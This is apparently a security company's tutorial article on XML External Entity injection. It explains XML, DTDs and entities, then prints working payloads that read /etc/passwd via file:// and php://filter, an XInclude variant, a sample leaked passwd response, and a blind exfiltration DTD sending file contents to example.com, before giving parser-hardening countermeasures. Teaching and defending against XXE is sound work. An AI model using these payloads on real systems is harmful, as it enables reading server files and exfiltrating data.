XML Injection

Attack possibilities and countermeasures

by Andrea Hauser

on October 05, 2023

time to read: 11 minutes

Keypoints

How to enforce XML Injection

The Extensible Markup Language (XML) is a way of transferring data
XML External Entities can be used for injection
This can lead to a leak of internal data and, if combined with other vulnerabilities, can lead to RCE
XML parsers should be configured in such a way that external entities and XInclude statements are not parsed

Although XML is no longer one of the most popular ways of transferring data, we still encounter it from time to time and every now and then see a non-hardened application that is vulnerable to XXE injection. Where XXE stands for XML External Entity. XXE Injections can be used to read files on the attacked system and if accessible to interact with other internal or external systems. Sometimes it is even possible to combine the XXE with SSRF and thus carry out further attacks.

Before we can go into XXE Injection in detail, however, we first need to define what XML and External Entities themselves are. XML stands for Extensible Markup Language and is intended as a text-based format for the exchange and storage of structured information. For example, an XML file used to represent a book might look like this:

<?xml version="1.0" encoding="UTF-8"?>
<book> <!-- root node -->
    <author id="1"> <!-- node with attribute -->
        <firstname> <!-- child of author node -->
            1337h4x0r <!-- node value -->
        </firstname>
        <lastname>Hacker</lastname>
    </author>
    <title>Best Hacking Book!</title>
</book>

Optionally, Document Type Definition (DTD) can also be used in XML. This can be used to define how the XML document must be structured and can be used to validate an XML document. DTDs can be loaded either internally, that is within the XML file itself, or externally, that is from another server. An internal DTD for the example shown above could therefore look like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [
    <!ELEMENT book(author, title)>
    <!ELEMENT author(firstname, lastname)>
    <!ELEMENT firstname (#CDATA)>
    <!ELEMENT lastname (#CDATA)>
    <!ELEMENT title (#CDATA)>
]>
<book>
    <author id="1">
        <firstname>1337h4x0r</firstname>
        <lastname>Hacker</lastname>
    </author>
    <title>Best Hacking Book!</title>
</book>

As an external DTD, it would look like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book SYSTEM "<https://example.com/example.dtd>">
<book>
    <author id="1">
        <firstname>1337h4x0r</firstname>
        <lastname>Hacker</lastname>
    </author>
    <title>Best Hacking Book!</title>
</book>

And on the system example.com in the file example.dtd the following is stored:

<!ELEMENT book(author, title)>
<!ELEMENT author(firstname, lastname)>
<!ELEMENT firstname (#CDATA)>
<!ELEMENT lastname (#CDATA)>
<!ELEMENT title (#CDATA)>

A DTD can also contain any self-defined entities, which in turn can be defined as an internal or external entity. Here is the example with an internal entity:

<!DOCTYPE book [
    <!ELEMENT book(author, title)>
    <!ELEMENT author(firstname, lastname)>
    <!ELEMENT firstname (#CDATA)>
    <!ELEMENT lastname (#CDATA)>
    <!ELEMENT title (#CDATA)>
    <!ENTITY example "Example Entity"> <!-- Definition Entity -->
]>
<book>
    <author id="1">
        <firstname>1337h4x0r</firstname>
        <lastname>Hacker</lastname>
    </author>
    <title>&example;</title>
</book>

After parsing the entity, Example Entity will be filled in as the title.

And the following is the example with an external entity:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [ <!ENTITY example SYSTEM "<https://example.com/example.dtd>"> ] >
<book>
    <author id="1">
        <firstname>1337h4x0r</firstname>
        <lastname>Hacker</lastname>
    </author>
    <title>&example;</title>
</book>

And on the system of example.com in the file example.dtd the following is stored:

<!ENTITY example "Example Entity">

Exploitation External Entities Injection

As an attacker, the DTD and entity definitions shown above can be misused for malicious purposes. A web application that uses XML to transfer data has an XML parser on the server side that processes this data. If the parser can be manipulated by an attacker to resolve external entities or to include internal files using file:// and an internal path, an attacker can gain access to internal information.

Let’s take the example already used above as a starting point for a query to a web server. If an attacker wants to query a local file on the server, the following malicious XML external entity query can be executed:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [ <!ENTITY example SYSTEM "file:///etc/passwd"> ] > <!-- malicious part of the query -->
<book>
    <author id="1">
        <firstname>1337h4x0r</firstname>
        <lastname>Hacker</lastname>
    </author>
    <title>&example;</title>
</book>

And if the /etc/passwd file can be read, it might either be that the contents are displayed in the HTML instead of the title of the book, or that an error message is shown revealing the contents of /etc/passwd:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
Content-Length: 600

"Invalid title: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin"

If it is possible to read local files, the following lists can be used to identify and read files of interest:

At the same time, however, it should also be checked whether the possibilities for a server-side request forgery attack exist and internal systems or, in the cloud environment, also metadata systems can be queried and further exploited. For cloud instances, interesting endpoints are in this list and more details and attack paths about SSRF attacks were described in the article on SSRF.

When the attacked system is using PHP, the following can be used to read files from the file system:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
<book>
    <author id="1">
        <firstname>1337h4x0r</firstname>
        <lastname>Hacker</lastname>
    </author>
    <title>&example;</title>
</book>

If the parser rejects the doctype defined by the attacker, one can still try to attack with XInclude. This would then look as follows:

<example xmlns:xi="<http://www.w3.org/2001/XInclude>">
<xi:include parse="text" href="file:///etc/passwd"/></example>

The attacks described so far can only be used if information is returned. However, the whole thing can also be done as a blind XXE injection. This can be done by triggering network interactions and trying to extract information about these interactions. A full exploit could then look like the following. The following malicious information is included in the request:

<!DOCTYPE book[<!ENTITY % xxe SYSTEM
"<https://example.com/example.dtd>"> %xxe;]>

and the following example.dtd is located on the attacker system:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'https://example.com/?x=%file;'>">
%eval;
%exfiltrate;

For this attack, XML parameter entities were used, which can be declared as follows:

<!ENTITY % exampleentity "Parameter Entity Wert" >

and can be called like this:

%exampleentity;

Publicly available bug bounty programmes show that XXE injection is still a problem that can occur in many different situations. For example, in image uploads, audio uploads or in VoiceXML specifications. In addition, it is also easy to show that an initial read-only vulnerability can be further exploited in combination with other vulnerabilities, which, for example, led to a remote code execution at the DoD. If, after reading this article, you are interested in trying out this type of vulnerability yourself, you can do so legally with the Portswigger Labs.

Countermeasures

The best way to protect against XML External Entity Injection is to configure the parser so that External Entities and XInclude are no longer parsed or allowed. The OWASP Cheat Sheet against XXE contains specific configurations per programming language and parser.

Conclusion

Although XML can no longer be considered the most popular data transfer format, it is still used in certain cases such as image uploads, SOAP messages and the like. When XML is used, care should be taken to prevent XML External Entity Injection possibilities as well as XInclude attacks by hardening the XML parser accordingly. In the absence of the suggested hardening, the effects can range from reading internal files, to exploring the internal network starting from the vulnerable server, and in the worst case to remote code execution if the vulnerability can be combined with other vulnerabilities.

About the Author

Andrea Hauser graduated with a Bachelor of Science FHO in information technology at the University of Applied Sciences Rapperswil. She is focusing her offensive work on web application security testing and the realization of social engineering campaigns. Her research focus is creating and analyzing deepfakes. (ORCID 0000-0002-5161-8658)

You want to test the security of your firewall?

Our experts will get in contact with you!

Prompt Injection

Andrea Hauser

Ways of attacking Generative AI

Andrea Hauser

Burp Macros

Andrea Hauser

WebSocket Fuzzing

Andrea Hauser

You want more?

Further articles available here

You need support in such a project?

Our experts will get in contact with you!

You want more?

Further articles available here

XML Injection

Attack possibilities and countermeasures

Keypoints

Exploitation External Entities Injection

Countermeasures

Conclusion

About the Author

Links

Tags

You want to test the security of your firewall?

Prompt Injection

Ways of attacking Generative AI

Burp Macros

WebSocket Fuzzing

You want more?

You need support in such a project?

You want more?